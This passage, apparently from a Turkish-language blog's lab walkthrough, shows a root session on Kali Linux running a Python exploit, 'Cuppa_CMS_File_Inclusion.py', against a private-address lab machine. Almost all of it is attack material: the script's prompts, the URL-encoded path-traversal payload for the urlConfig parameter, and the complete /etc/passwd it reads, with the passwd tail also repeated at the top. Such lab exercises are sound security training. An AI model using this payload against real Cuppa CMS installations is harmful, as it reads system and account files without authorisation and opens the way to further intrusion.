usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
"""
┌──(root💀kali)-[~]
└─# python3 Cuppa_CMS_File_Inclusion.py
[*] Enter the target ip adress.
>> 192.168.6.135
[*] The target address is similar to which of the following?
1. http://192.168.6.135/
2. http://192.168.6.135/administator/
3. http://192.168.6.135/cuppa/
4. Other
>> 2
[*] Enter the full path of the file you want to read.
>> /etc/passwd
[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
İlk Yorumu Siz Yapın